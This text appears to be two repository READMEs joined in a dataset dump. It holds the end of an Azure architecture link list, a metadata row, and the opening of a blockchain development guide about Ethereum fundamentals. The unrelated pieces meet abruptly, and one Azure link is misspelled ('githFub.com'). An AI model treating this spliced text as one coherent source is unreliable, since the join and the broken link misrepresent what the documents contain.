- [Cloud Practice Playbooks](https://partner.microsoft.com/en-us/campaigns/cloud-practice-playbooks)
- [Designing Distributed Systems](https://azure.microsoft.com/en-us/resources/designing-distributed-systems/?WT.mc_id=AZ-MVP-5004796)
- [Enterprise Cloud Strategy](https://azure.microsoft.com/en-us/resources/enterprise-cloud-strategy/?WT.mc_id=AZ-MVP-5004796)
- [FinOps with Azure - Bringing FinOps to life through organizational and cultural alignment](https://azure.microsoft.com/en-us/resources/finops-with-azure-bringing-finops-to-life-through-organizational-and-cultural-alignment/?WT.mc_id=AZ-MVP-5004796)
- [Get up and running with Kubernetes](https://azure.microsoft.com/en-us/resources/kubernetes-ebook-collection/?WT.mc_id=AZ-MVP-5004796)
- [How to Choose the Right Azure Services for Your Applications—It's Not A or B E-book Series](https://azure.microsoft.com/en-au/resources/how-to-choose-the-right-azure-services-for-your-applicationsits-not-a-or-e-book-series/?WT.mc_id=AZ-MVP-5004796)
- [Learn Azure in a Month of Lunches](https://azure.microsoft.com/mediahandler/files/resourcefiles/learn-azure-in-a-month-of-lunches/Learn_Azure_in_a_Month_of_Lunches.pdf?WT.mc_id=AZ-MVP-5004796)
- [Migrating Linux to Microsoft Azure](https://azure.microsoft.com/en-us/resources/migrating-linux-to-microsoft-azure/?WT.mc_id=AZ-MVP-5004796)
- [Migration SQL Server databases to Azure](https://download.microsoft.com/download/9/8/C/98C3E3C8-E016-443D-BE22-CFEB187DAFFA/Microsoft_Press_eBook_Migrating_SQL_Server_Databases_to_Azure_8.5x11.pdf?WT.mc_id=AZ-MVP-5004796)
- [Rethinking Enterprise Storage](https://download.microsoft.com/download/8/5/6/85677038-09DE-4F20-AECD-C7A44B5A7E1E/679603ebook.pdf?WT.mc_id=AZ-MVP-5004796)
- [The Developer's Guide to Azure](https://azure.microsoft.com/en-us/resources/whitepapers/developer-guide-to-azure/?WT.mc_id=AZ-MVP-5004796)
### Official Repositories and Tools
Official Microsoft open-source initiatives and repositories.
- [AKS Landing Zone Accelerator](https://github.com/Azure/AKS-Landing-Zone-Accelerator)
- [AKS Release Status](https://releases.aks.azure.com/webpage/index.html#tabasia)
- [ALZ Bicep](https://github.com/Azure/ALZ-Bicep)
- [APIM(Azure API Management)Love](https://aka.ms/apimlove)
- [ARO (Azure Red Hat Openshift) Landing Zone Accelerator](https://github.com/Azure/aro-Landing-Zone-Accelerator)
- [AVDAccelerator](https://github.com/Azure/avdaccelerator)
- [AVDBluePrint](https://github.com/Azure/AVDBlueprint)
- [Alert Toolkit](https://github.com/microsoft/manageability-toolkits)
- [App Service Landing Zone Accelerator](https://github.com/Azure/appservice-landing-zone-accelerator)
- [Azure Accelerators](https://msusazureaccelerators.github.io/)
- [Azure AlwaysOn](https://github.com/Azure/AlwaysOn#readme)
- [Azure Backup Detailed Estimate](https://aka.ms/AzureBackupDetailedEstimates/?WT.mc_id=AZ-MVP-5004796)
- [Azure Certification Poster](http://aka.ms/traincertposter/?WT.mc_id=AZ-MVP-5004796)
- [Azure Certified IoT Device catalog](https://devicecatalog.azure.com/)
- [Azure Certs Poster](https://aka.ms/AzureCerts_poster?WT.mc_id=AZ-MVP-5004796)
- [Azure Connectivity Toolkit (AzureCT)](https://github.com/Azure/NetworkMonitoring/tree/main/AzureCT)
- [Azure Container Apps Workshop](https://aka.ms/aca-workshop)
- [Azure DevOps Marketplace](https://marketplace.visualstudio.com/azuredevops/?WT.mc_id=AZ-MVP-5004796)
- [Azure Hybrid Use Benefit Calculator](https://azure.microsoft.com/en-us/pricing/hybrid-benefit/?WT.mc_id=AZ-MVP-5004796#calculator)
- [Azure Infrastructure Map](https://infrastructuremap.microsoft.com/)
- [Azure Integration Services Landing Zone Accelerator](https://github.com/Azure/Integration-Services-Landing-Zone-Accelerator)
- [Azure Landing Zones for Canadian Public Sector](https://github.com/Azure/CanadaPubSecALZ)
- [Azure NoOps Accelerator](https://github.com/Azure/NoOpsAccelerator)
- [Azure Pricing Calculator](https://azure.microsoft.com/en-us/pricing/calculator/?WT.mc_id=AZ-MVP-5004796)
- [Azure Proactive Resiliency Library (APRL)](https://github.com/Azure/Azure-Proactive-Resiliency-Library-v2)
- [Azure Quickstart Templates](https://github.com/Azure/azure-quickstart-templates)
- [Azure Rapid Assessment Estimator](https://usdco.azurewebsites.net/Resources.aspx)
- [Azure Resource Explorer](https://resources.azure.com/)
- [Azure Review Checklists](https://github.com/Azure/review-checklists)
- [Azure Site Recovery Deployment Planner](https://learn.microsoft.com/en-us/azure/site-recovery/site-recovery-deployment-planner/?WT.mc_id=AZ-MVP-5004796)
- [Azure Stack HCI Sizer](https://azurestackhci-webapplication.azurewebsites.net/#/sizer)
- [Azure Stack HCI Solutions](https://hcicatalog.azurewebsites.net/#/?ProductOptimizedFor=Branch+office+and+edge)
- [Azure Status](https://status.azure.com/en-us/status)
- [Azure Storage Explorer](https://azure.microsoft.com/en-us/features/storage-explorer/?WT.mc_id=AZ-MVP-5004796)
- [Azure Threat Research Matrix](https://microsoft.github.io/Azure-Threat-Research-Matrix/)
- [Azure Twitter](https://twitter.com/Azure)
- [Azure Updates](https://aka.ms/azureroadmap/?WT.mc_id=AZ-MVP-5004796)
- [Bicep subscription vending](https://github.com/Azure/bicep-lz-vending)
- [Business Continuity Guide](https://techcommunity.microsoft.com/t5/fasttrack-for-azure/introducing-the-azure-business-continuity-guide/ba-p/3905424?WT.mc_id=AZ-MVP-5004796)
- [Cloud Adoption Framework - Code samples and templates related to landing zone creation](https://github.com/microsoft/CloudAdoptionFramework/tree/master/ready)
- [Cloud Adoption Framework landing zones for Terraform - Starter template](https://github.com/Azure/caf-terraform-landingzones-starter)
- [Cloud Roles and Operations Management](https://github.com/Azure/cloud-rolesandops)
- [Common Azure Bicep and ARM Modules Library](https://github.com/Azure/ResourceModules)
- [Data Management & Analytics Scenario - Data Landing Zone](https://github.com/Azure/data-landing-zone)
- [DevOps Tooling for Well-Architected Recommendation Process](https://github.com/Azure/WellArchitected-Tools/tree/main/WARP/devops#readme)
- [Enterprise-Scale - Reference Implementation](https://github.com/Azure/Enterprise-Scale)
- [FastTrack for Azure - AKS Operations](https://github.com/Azure/fta-aks-operations)
- [FastTrack for Azure - Architectural Review](https://github.com/Azure/fta-architecturalreview)
- [FastTrack for Azure - As a Service - Azure Design Review](https://ftaaasdev.z6.web.core.windows.net/)
- [FastTrack for Azure - Azure Live - How to deploy Azure services and infrastructure. Leverage Azure Pipeline for CI/CD](https://github.com/Azure/fta-live-iac)
- [FastTrack for Azure - Azure Live Azure Purview](https://github.com/Azure/fta-azurepurview)
- [FastTrack for Azure - Azure Live Sessions](https://github.com/Azure/FTALive-Sessions)
- [FastTrack for Azure - Azure Marketplace](https://github.com/Azure/fta-marketplace-tech)
- [FastTrack for Azure - Cloud Architecture](https://github.com/Azure/fta-cloudarchitecture)
- [FastTrack for Azure - Foundations](https://github.com/Azure/fta-azurefoundations)
- [FastTrack for Azure - FTA Live for Azure Sentinel](https://github.com/Azure/FTA-APACSentinel)
- [FastTrack for Azure - Governance](https://github.com/Azure/fta-governance)
- [FastTrack for Azure - Identity](https://github.com/Azure/fta-identity)
- [FastTrack for Azure - Landing Zone](https://github.com/Azure/fta-landingzone)
- [FastTrack for Azure - Managed Disks](https://github.com/Azure/fta-manageddisks)
- [FastTrack for Azure - Modern Service Management](https://github.com/Azure/fta-ModernServiceManagement)
- [FastTrack for Azure - Monitoring](https://github.com/Azure/fta-monitoring)
- [FastTrack for Azure - Networking](https://github.com/Azure/fta-networking)
- [FastTrack for Azure - Vision AI Session Resources](https://github.com/Azure/fta-ai-learning)
- [FastTrack for Azure - Windows Virtual Desktop](https://github.com/Azure/fta-windowsvirtualdesktop)
- [Hybrid Cloud Deal Size Estimator](https://azurehybridestimator.azurewebsites.net/)
- [Microsoft Azure - Feedback](https://feedback.azure.com/d365community)
- [Microsoft Datacenter Migration Program Kit (DCM Kit)](https://github.com/microsoft/dcmkit)
- [Microsoft Defender for Cloud](https://github.com/Azure/Microsoft-Defender-for-Cloud)
- [Microsoft Exam Simulator](https://aka.ms/examdemo/?WT.mc_id=AZ-MVP-5004796)
- [Microsoft Kusto Detective Agency](https://detective.kusto.io/)
- [Microsoft Sustainability Calculator](https://aka.ms/SustainabilityCalculator)
- [Mission LZ (Landing Zone)](https://github.com/Azure/missionlz)
- [Solution Architecture Questions](https://github.com/Azure/Solution-Architecture-Questions)
- [Static Web Apps CLI](https://azure.github.io/static-web-apps-cli/)
- [Synapse Machine Learning](https://github.com/microsoft/SynapseML)
- [The Migration Guide](https://github.com/Azure/migration)
- [Total Cost of Ownership (TCO) Calculator](https://azure.microsoft.com/en-us/pricing/tco/calculator/?WT.mc_id=AZ-MVP-5004796)
- [Virtual machines selector](https://azure.microsoft.com/en-gb/pricing/vm-selector/?WT.mc_id=AZ-MVP-5004796)
### Official Forums and Feedback
Official Microsoft product feedback sources.
- [Azure Connection Program (ACP)](https://aka.ms/ACPNomination)
- [Azure Governance & Deployments](https://github.com/Azure/azure-policy#general-questions)
- [Microsoft Azure - General Feedback](https://feedback.azure.com/d365community/?WT.mc_id=AZ-MVP-5004796)
- [Microsoft Azure Arc Community Monthly Meetup](https://githFub.com/microsoft/azure_arc_community)
- [Microsoft Q&A](https://learn.microsoft.com/en-us/answers/index.html?WT.mc_id=AZ-MVP-5004796)
- [Tech Community - Azure](https://techcommunity.microsoft.com/t5/azure/ct-p/Azure?WT.mc_id=AZ-MVP-5004796)
### Official Meetups and Calls
Microsoft delivered community engagement meetings.
- [Adaptive Cloud Community](https://github.com/microsoft/adaptive_cloud_community)
- [Azure Kubernetes Service (AKS) Community](https://github.com/theakscommunity/aks-community-meetings)
- [Azure ARM/Bicep Community Calls](https://github.com/Azure/bicep/issues?q=label%3A%22Community+Call%22+)
- [Azure Development Community Call](https://github.com/Azure/azure-dev/discussions/categories/announcements)
- [Azure DSC Community Call](https://dsccommunity.org/community_calls/)
- [Azure Landing Zone Community Calls](https://aka.ms/ALZ/CommunityCallAgenda)
- [Azure Static WebApps - Community Livestream](https://aka.ms/swa/community/standups)
- [Azure Tech Groups](https://www.meetup.com/pro/azuretechgroups)
- [Cloud Security](https://techcommunity.microsoft.com/t5/security-compliance-and-identity/join-our-security-community/ba-p/927888?WT.mc_id=AZ-MVP-5004796)
- [M365 Platform Community](https://pnp.github.io/#community)
- [Microsoft Reactor](https://developer.microsoft.com/en-us/reactor/?WT.mc_id=AZ-MVP-5004796)
- [PowerShell](https://github.com/PowerShell/PowerShell-RFC/tree/master/CommunityCall)
- [Radius Community Meetings](https://github.com/radius-project/community#community-meetings)
- [Semantic Kernel Community Calls](https://github.com/microsoft/semantic-kernel/blob/main/COMMUNITY.md)
- [Terraform](https://aka.ms/AzureTerraform)
- [Windows Customer Connection](https://techcommunity.microsoft.com/t5/windows-it-pro-blog/join-the-windows-customer-connection-program/ba-p/3473775?WT.mc_id=AZ-MVP-5004796)
### Official Podcasts
Official Microsoft podcasts.
- [Getting Closer to Cloud](https://open.spotify.com/show/64CCVDW3yd7bQKRPJHI7CM?si=23975e78b419434e)
- [Learn Azure in a Month of Lunches](https://audio.microsoft.com/azuremonthoflunches/watch/qzF4iAbmwq8rsQKvVxUscJ)
- [The Azure for Executives Podcast](https://azure.microsoft.com/en-us/industries/podcast/?WT.mc_id=AZ-MVP-5004796)
## Community
> Links below are from community sources, websites, and channels.
### Community Videos
Community videos.
- [Azure explained in plain English videos](https://www.youtube.com/lessthan5min)
- [Microsoft Azure Master Class](https://www.youtube.com/watch?v=rZcyDHIYpO0&list=PLlVtbbG169nGccbp8VSpAozu3w9xSQJoY)
- [Regain Control with Azure Governance](https://www.youtube.com/watch?v=M2y0QsHLeSs)
### Community Podcasts
Community podcasts.
- [Azure All Stars](https://azureallstars.co.nz/)
- [Azure Centric Podcast](https://open.spotify.com/show/0r52YLLXq7fdV1xE5la8gq?autoplay=true)
- [Azure Lunch](https://podcasts.apple.com/us/podcast/azure-lunch/id1436427476)
- [Cloud Solution Architects podcast](https://open.spotify.com/show/3BbVrW8lqA1BJ7McsFYDCL)
- [Ctrl+Alt+Azure](https://ctrlaltazure.com/)
- [Sarah Leans Podcast](https://open.spotify.com/show/34QAAvMLSYN09eOAu3j2b0)
- [The Azure Podcast](https://azpodcast.azurewebsites.net/)
- [The Azure Security Podcast](https://azsecuritypodcast.azurewebsites.net/)
### Community Books
Community books, both physical and ebooks.
- [Azure Architecture Explained](https://www.packtpub.com/product/azure-architecture-explained/9781837634811)
- [Azure Security](https://www.manning.com/books/azure-security-2)
- [Cloud Solution Architect's Career Master Plan: Proven techniques and effective tips to help you become a successful solution architect](https://www.amazon.com/Cloud-Solution-Architects-Career-Master/dp/1805129716)
- [Exam Ref AZ-104 Microsoft Azure Administrator](https://www.bookdepository.com/Exam-Ref-AZ-104-Microsoft-Azure-Administrator-Harshul-Patel/9780136805380?ref=grid-view&qid=1641883617185&sr=1-2)
- [Exam Ref AZ-303 Microsoft Azure Architect Technologies](https://www.bookdepository.com/Exam-Ref-AZ-303-Microsoft-Azure-Architect-Technologies-Timothy-Warner/9780136805090?ref=grid-view&qid=1641883617185&sr=1-5)
- [Exam Ref AZ-304 Microsoft Azure Architect Design](https://www.bookdepository.com/Exam-Ref-AZ-304-Microsoft-Azure-Architect-Design-Ashish-Agrawal/9780137268894?ref=grid-view&qid=1641883617185&sr=1-8)
- [Microsoft 365 Security for IT Pros](https://m365securitybook.com/)
- [Microsoft Azure Architect Technologies and Design](https://www.bookdepository.com/Microsoft-Azure-Architect-Technologies-Design-Complete-Study-Guide-Exams-AZ-303-AZ-304-Benjamin-Perkins/9781119559535?ref=grid-view&qid=1641883617185&sr=1-10)
- [Microsoft Azure Infrastructure Services for Architects: Designing Cloud Solutions](https://www.bookdepository.com/Microsoft-Azure-Infrastructure-Services-for-Architects-John-Savill/9781119596578?ref=grid-view&qid=1641883617185&sr=1-15)
### Community Articles
Community blogs and articles.
- [Architecture in the Cloud](https://luke.geek.nz/azure/architecture-in-the-cloud/)
- [Azure - Considerations for Dev/Test "Sandboxes"](https://github.com/dazzlejim/AzureSandbox)
- [Azure Architecture - Design Principles and Lessons Learned](https://medium.com/azure-architects/azure-architecture-design-principles-and-lessons-learned-e79d700b5f39)
- [Azure Citadel](https://azurecitadel.com/)
- [Azure DevOps and creating your Cloud Adoption Framework](https://luke.geek.nz/azure/azure-devops-and-creating-your-cloud-adoption-framework/)
- [Deploy Azure Naming Tool into an Azure WebApp as a container](https://luke.geek.nz/azure/deploy-azure-naming-tool-into-an-azure-webapp-as-a-container/)
- [How to write a design document for Azure](https://www.cloudelicious.net/how-to-write-a-design-document-for-azure/)
- [Luke Murrays - Azure Blog](https://luke.geek.nz/)
- [Microsoft Azure - Wikipedia](https://en.wikipedia.org/wiki/Microsoft_Azure)
- [Microsoft Azure Naming Conventions](https://luke.geek.nz/azure/microsoft-azure-naming-conventions/)
- [Microsoft Azure Tagging Conventions](https://luke.geek.nz/azure/microsoft-azure-tagging-conventions/)
- [Microsoft Sentinel in Action: Architect, design, implement, and operate Microsoft Sentinel as the core of your security solutions](https://www.amazon.com/Microsoft-Sentinel-Action-Architect-implement/dp/1801815534/ref=sr_1_21?crid=HVH5XJ9I8ACC&keywords=Microsoft+Azure&qid=1641883536&s=books&sprefix=microsoft+azu%2Cstripbooks-intl-ship%2C370&sr=1-21)
- [Study Guide for Azure Architect exam AZ-305: Part 1 – Design a Governance Solution](https://thecloudmarathoner.com/index.php/2022/02/11/study-guide-for-az-305-designing-microsoft-azure-infrastructure-solutions-part-1-design-a-governance-solution/)
- [Study Guide for Azure Architect exam AZ-305: Part 2 – Design Authentication and Authorization Solutions](https://thecloudmarathoner.com/index.php/2022/02/12/study-guide-for-az-305-part-2-design-authentication-and-authorization-solutions/)
### Community Repositories and Tools
Community-created tools and repositories.
- [ASTEROID Project (BETA)](https://azure.github.io/Asteroid/)
- [Azure Architecture](https://github.com/lukemurraynz/Azure-Architecture)
- [Azure Architecture - Solution Requirement Consideration Checklist](https://luke.geek.nz/azure/azure-architecture-solution-requirement-consideration-checklist/)
- [Azure Arc Jumpstart (Arcbox)](https://azurearcjumpstart.io/azure_jumpstart_arcbox/full/)
- [Azure Charts](https://azurecharts.com/)
- [Azure Composite SLA Estimator](https://slaestimator.aztoso.com/)
- [Azure Depreciation Dashboard](https://github.com/azure-deprecation/dashboard/issues/)
- [Azure Design Stencils](https://github.com/David-Summers/Azure-Design)
- [Azure Diagrams](https://azurediagrams.com/)
- [Azure Governance Made Simple](https://book.azgovernance.com/)
- [Azure Governance made simple](https://github.com/ricmmartins/azure-governance-made-simple)
- [Azure IP Ranges](https://azureipranges.azurewebsites.net/)
- [Azure IPAM](https://azure.github.io/ipam/#/)
- [Azure Network Security](https://github.com/Azure/Azure-Network-Security)
- [Azure Optimization Engine](https://github.com/helderpinto/AzureOptimizationEngine)
- [Azure permissions reference](https://azure.permissions.cloud/)
- [Azure Price](https://azureprice.net/)
- [Azure Quick Review](https://github.com/cmendible/azqr/tree/main)
- [Azure Resource Inventory](https://github.com/azureinventory/ARI)
- [Azure Serverless Community Library](https://www.serverlesslibrary.net/)
- [Azure Services Periodic Table](https://azureperiodic.data3.com/)
- [Azure Speed](https://www.azurespeed.com/Azure/Latency)
- [Azure Stack HCI Hands-on-lab guides](https://github.com/DellGEOS/AzureStackHOLs)
- [Azure Tenant Security Solution (AzTS)](https://github.com/azsk/AzTS-docs)
- [Azure TRE](https://microsoft.github.io/AzureTRE/latest/)
- [Azure Virtual Network Capacity Planner](https://vnetplanner.chunliu.me/)
- [Azure Workbench](https://www.azureworkbench.com/)
- [AzureFeeds](https://azurefeeds.com/)
- [AzADServicePrincipalInsights](https://aka.ms/AzADServicePrincipalInsights)
- [AzAdvertizer](https://www.azadvertizer.net/)
- [AzGovViz](https://github.com/JulianHayward/Azure-MG-Sub-Governance-Reporting)
- [AzTools](https://az.nitor.app/)
- [Cloud Custodian](https://cloudcustodian.io/)
- [Cloud Harmony](https://cloudharmony.com/)
- [Cloud Journey](https://github.com/geeksintheweeds/cloud-journey)
- [Cloud Native Architecture Mapbook](https://github.com/PacktPublishing/The-Azure-Cloud-Native-Architecture-Mapbook)
- [Continuous Cloud Optimization Insights](https://github.com/Azure/CCOInsights)
- [Docs Update Tracker](https://docsupdatetracker.net/index.html)
- [dotnet-azure-naming](https://github.com/hlaueriksson/dotnet-azure-naming)
- [Managed Azure Bastion Savings Calculator](http://calc.microcloudservice.com/)
- [Microsoft Azure - Center for Internet Security](https://www.cisecurity.org/benchmark/azure/)
- [Microsoft Azure Security Control Mappings to MITRE ATT&CK](https://github.com/center-for-threat-informed-defense/security-stack-mappings)
- [Microsoft Portals](https://msportals.io/)
- [MSLab](https://github.com/microsoft/MSLab)
- [Must Learn KQL - the series, the book, the merch store](https://github.com/rod-trent/MustLearnKQL)
- [PSRule for Azure](https://github.com/Azure/PSRule.Rules.Azure)
- [Public Cloud Comparison](https://comparecloud.in/)
- [Service Bus Explorer](https://github.com/paolosalvatori/ServiceBusExplorer)
- [Terraform](https://www.terraform.io/)
- [The Azure Kubernetes Service Checklist](https://www.the-aks-checklist.com/)
- [Traffic Flow in Common Azure Networking Patterns](https://github.com/mattfeltonma/azure-networking-patterns)
- [WhatTheHack-collection of hackathons](https://github.com/microsoft/WhatTheHack)
- [[cmd.ms] the Microsoft Cloud command line](https://cmd.ms/)
### Community Newsletter
Community-delivered newsletters.
- [AzureFeeds Newsletter](https://newsletter.azurefeeds.com/join)
- [Entra.News](https://entra.news/)
### Community Forums
Community-delivered and supported forums.
- [Reddit - Azure](https://www.reddit.com/r/AZURE/)
- [Stack Overflow - Azure](https://stackoverflow.com/questions/tagged/azure)
### Community Discord
Community delivered and supported Discord.
- [100 Days of Cloud](https://discord.gg/fwsn67hH)
- [ITOpsTalk's server](https://discord.gg/JXXmcgET)
- [Microsoft Community](https://discord.gg/microsoft)
- [PowerShell](https://discord.gg/powershell)
- [Reddit - Azure](https://discord.gg/cMxFErsEDB)
### Community Slack
Community delivered and supported Slack.
- [Ask an Azure Architect](https://askazure.io/)
| AWESOME-Azure-Architecture - https://aka.ms/AwesomeAzureArchitecture | azure,architecture,cloud,microsoft,awesome,awesome-list,security | 0 | 8 | 33 | 333 | 0 | 1 | 2 |
dcbuild3r/blockchain-development-guide | # Disclaimer: this repo is not maintained with up to date content. Please visit [devpill.me](https://devpill.me/) to read the newest version of this guide.
# DevPill.me - A Public Good Blockchain Development Guide
![blockchain development guide NFT](./images/blockchain_development_guide.jpg)
## Support this public good
I’m trying to gather resources to fund the development of this public good blockchain development guide and so I got my fren Ana Rueda (@ruedart) to create this amazing graphic for the [Mirror NFT edition](https://dcbuilder.mirror.xyz/PLNPOmKkYaP14kJa5A5pJgyIlg4dWHpjDiHS7BGC7J4). The funds will go to the continued development of this guide (90%) and to Ana for the creation of the art (10%). I’m open to discussion on how to structure the open collaboration around the guide and to allocating the funds into a community-owned multi-sig. The goal is to use the funds gathered on Mirror, Gitcoin grants round 13 and elsewhere to incentivize developers to create sections through bounty submissions. If this idea doesn’t gather appeal, then I will send the funds to the Gitcoin grants matching round so that other public goods get funded. Links to support the development of the blockchain development guide:
- [Mirror NFTs](https://dcbuilder.mirror.xyz/PLNPOmKkYaP14kJa5A5pJgyIlg4dWHpjDiHS7BGC7J4)
- [Gitcoin grants](https://gitcoin.co/grants/4975/devpillme-a-public-good-blockchain-development-gu) (Gitcoin grants round 13 goes from march 9th - 24th, happens recurrently every 3 months)
## Community
If you want to contribute to devpill or to discuss any of the topics and resources found in the guide. Feel free to join our [Discord](https://discord.gg/devpillme), and follow us on [Twitter](https://twitter.com/devpillme) and [Lenster](https://lenster.xyz/u/devpillme.lens).
This repo will not reflect any changes on the [devpill.me website](http://devpill.me/), the repo for the site can be found [here](https://github.com/dcbuild3r/devpill.me) and content with the corresponding markdown files is located in [this directory](https://github.com/dcbuild3r/devpill.me/tree/9f87bc7c77a5ec897c01f7cfbd9eae8842c260ac/content/en/docs). Please submit PRs there instead as it makes it easier for me to process and review.
## Introduction
Nowadays there are countless well-made resources on how to learn blockchain development of all kinds and with different specializations in mind, however, it is still very hard to get guidance and personalized suggestions based on your interests. I am writing this guide in order to provide an aggregator of all the resources that I've found over the years, plus give some opinionated commentary on how to approach them and how to use them in order to maximize learning and practical understanding in order to get building cool things in the space as soon as possible.
This guide will focus on the Ethereum ecosystem as that's where most developers and applications are. If you are interested in other ecosystems that are non-EVM compatible and are not L2s on Ethereum, then check out their respective documentation or guides written by their developer communities. Examples of other non-EVM compatible blockchains that are popular are Solana (Rust/Anchor), Polkadot (Rust/Substrate), Cosmos, Terra, and others. Most of these blockchains do or will support the EVM stack through various initiatives like Neon EVM (Solana), Moonbeam/Moonriver (Polkadot/Kusama), EVMOS (Cosmos), etc.
I really want this guide to become a community-sourced public good that everyone will be able to take advantage of. I will do my best to present it to the wider blockchain developer community to get constructive feedback, proofreading help, and insight into how to make it the best available guide available.
### What is blockchain development?
There are two main categories in my mind, either you build the infrastructure that runs blockchain-based networks or you build applications that run on top of these decentralized and permissionless networks. Of course, this differentiation doesn't encompass all types of development on blockchains, but it is a good way to get started.
#### Core blockchain development
By blockchain infrastructure, people usually mean client implementations of blockchain protocols that nodes or validators run to keep the chains running. These clients are usually focused on distributed ledger technology, networking, virtual machines, and various other low-level types of engineering. The client is what enforces the rules of the blockchain protocol, runs the consensus mechanism, that executes all transactions in the network and makes sure all nodes are in sync, and more. This is also known as core blockchain development, which is not what most devs picture when thinking about blockchain or web3 development in general. There are various niches within blockchain development itself as well; you can focus on improving execution capabilities with technologies like rollups, validiums, or volitions, you can improve decentralization and security guarantees by innovating on the consensus layer of the protocol, etc.
#### Blockchain API
There's also blockchain infrastructure that supports the application layer by providing APIs to access blockchain data like oracles for smart contracts, indexing services for back ends, libraries that allow you to call and listen to smart contract events, decentralized storage services, and more. There are applications that aggregate data from different smart contracts, transactions, and events on the blockchain to provide useful insight, these apps are mostly centered around data analysis and are not necessarily decentralized, but require an understanding of the underlying blockchain-based technologies.
#### Blockchain application layer
The most popular type of blockchain development is on top of the application layer. Building decentralized applications (Dapps) can take many different forms, but it usually involves a smart contract and a user interface that interacts with that smart contract and listens to changes in the state of the blockchain. These applications can serve various use cases and can be used to build decentralized financial services, games, and so much more.
If these concepts are completely foreign to you I suggest reading the how to get started section first, or Google the words you may not understand.
### Specializations
There are many different specializations within blockchain development, each requires a different set of skills, however a general understanding of distributed systems, basic cryptography, and knowing how smart contracts operate is required as a foundation for all of them. In this guide I'll try to provide a general overview of each of them, as well as give the best guidance I can provide on the resources learners should prioritize and in which order they should take them. There are many roles that I'm not as familiarized with, so feel free to suggest pull requests with changes or DM with suggestions.
#### Skill-based
There are different sets of skills required for different specializations, the technology stack and knowledge needed are determined by the layer and application that you want to target as a developer. I believe that everyone should get a solid general foundation and try out different areas and niches before settling on the main stack they want to focus on. Some people choose specializations according to the end goal that they want to accomplish using blockchain-based technologies, others like myself feel like everything is interesting and can't settle on a single one to specialize in when confronted with an analysis paralysis situation.
This guide will cover these main tracks, however anyone is free to submit a pull-request to add more or expand on the already existing ones:
- [Frontend development](#front-end-development)
- [Smart contract development](#smart-contract-development)
- [Backend blockchain development](#backend-development)
- [Core protocol development](#core-protocol-development)
- [Full-stack blockchain development](#full-stack-blockchain-development)
- [Cryptography](#cryptography)
**Coming soon**
- [Security engineer](#security-engineer)
- [MEV searcher](#mev-searcher)
- [Cryptography](#cryptography)
- [Blockchain data analytics](#blockchain-data-analytics)
#### Application-based
Another way to separate types of blockchain development is not based on the underlying tech stack, but on the use case that you are targeting. These are the categories that I believe are the most popular, however, there are many others that I'm not covering to keep the scope of this article more manageable.
**Coming soon**
- [DeFi](#defi)
- [Creator Economy](#creator-economy)
- [MEV](#mev)
- [L2s](#l2s)
- [Infrastructure](#infrastructure)
- [Gaming](#gaming-development)
- [Privacy](#privacy)
- [Coordination / Public goods](#coordination--public-goods)
#### Non-technical sections
- [Getting a job](#getting-a-job)
- [Social Capital](#social-capital)
- [Mastery](#mastery)
- [Community](#community)
## How to get started?
No matter if you are a beginner programmer or if you've been coding for years, this guide will provide resources for all levels of expertise. If there is something that you already know in the specialization roadmaps that I have here, feel free to skip the material or use it as an opportunity to review what you already know and potentially fill in some gaps in your understanding.
Blockchain development might seem very intimidating at first, there are many moving parts, foundational knowledge from various different fields is required, the technologies are constantly evolving and aren't as mature as in other areas of development such as in the web development space, there is a financial aspect to almost every application as you are programming on top of a value layer, etc. However, it is not as hard as you might think. Once you get familiarized with the basics, understanding everything else that is going on is usually just a matter of applying a general understanding to a specific situation. If you build a strong foundation then it will be much easier to process more complex topics and reason about problems relating to a new subject matter.
If you have a background in computer science, mathematics, or any related field, then you will have a much easier time getting started with blockchain development as many foundational concepts are abstractions of algorithms and data structures. If you are a complete beginner then please make sure you take the initial few steps with patience so as to not feel overwhelmed. Once you start familiarizing yourself with the material you will start to feel like it is more manageable.
### General foundation
In order to get started with blockchain development, one must first get started with understanding how blockchains work in order to build a mental model of how each moving piece works and to get an understanding of the design principles which will govern your development experience.
#### Blockchains
The term blockchain has two different meanings, it can either relate to a data structure or to a computer network.
A blockchain (data structure) consists of sets of transactions or data bundled inside a container where each container has a cryptographic [hash](https://www.youtube.com/watch?v=QJ010l-pBpE) of the data in the previous container (block) within it. If the contents of the previous block change, the hash changes as well and thanks to this feature we can assure that the data hasn't been tampered with. The second consequence of the blockchain data structure is that it is append-only. You can't prepend data to it, nor modify the data already within it, as that would alter the hashes of all the blocks succeeding the ones that have been modified. This is why we call blockchains immutable.
A blockchain (network) is a network of computers that have a synchronized ledger of transactions that uses the blockchain (data structure) for storing data (usually inside of merkle/verkle trees). The blockchain is powered by miners/validators which operate under a so-called consensus algorithm, this algorithm helps coordinate who produces and organizes blocks as well as indicating which is the longest chain, by updating the head of the blockchain continuously. Blockchains have 3 main properties which they try to optimize for; Security, Decentralization, and Scalability. They achieve security and decentralization through their consensus algorithm where many different parties need to either provide resources mostly in the form of running expensive operations on massive hardware facilities with [Proof-of-Work](https://en.wikipedia.org/wiki/Proof_of_work) (PoW) or by staking economic resources in the network with [Proof-of-Stake](https://ethereum.org/en/developers/docs/consensus-mechanisms/pos/) (PoS). The more participants and the more distributed the power dynamics among those participants, the more security and decentralization. There are many other features that contribute to decentralization, like client software which is able to be run on consumer hardware so that anyone can synchronize the state of the blockchain in their nodes, minimizing how many transactions you can process per block so as to not make the state of it too big and much more.
- **Further reading**
In order to understand how blockchains work beyond my simple explanation here read and watch the following resources:
- [Blockchain Explained - Investopedia](https://www.investopedia.com/terms/b/blockchain.asp)
- [Blockchain 101 - Anders Brownworth](https://www.youtube.com/watch?v=_160oMzblY8)
- [But how does Bitcoin actually work? - 3Blue1Brown](https://www.youtube.com/watch?v=bBC-nXj3Ng4)
- Optional (cultural significance): [Bitcoin whitepaper](https://bitcoin.org/bitcoin.pdf)
#### Ethereum
Since this is a guide about blockchain development on Ethereum, it is required to know how the Ethereum blockchain works, and the changes that it will undergo in the future so as to be prepared for what's to come as a developer. If you have done web development before you can think of changes as a new ECMAScript standard, a new browser compile target (ie. WASM), a new engine (V8), etc... The Ethereum blockchain is constantly evolving and quite a few changes will be put in place in the future before the core technologies of the network will start to ossify.
A good way to get started with how Ethereum works is to watch [Austin Griffith](https://twitter.com/austingriffith)'s [ETH.BUILD YouTube playlist](https://www.youtube.com/playlist?list=PLJz1HruEnenCXH7KW7wBCEBnBLOVkiqIi) where he illustrates how various parts of the Ethereum blockchain work.
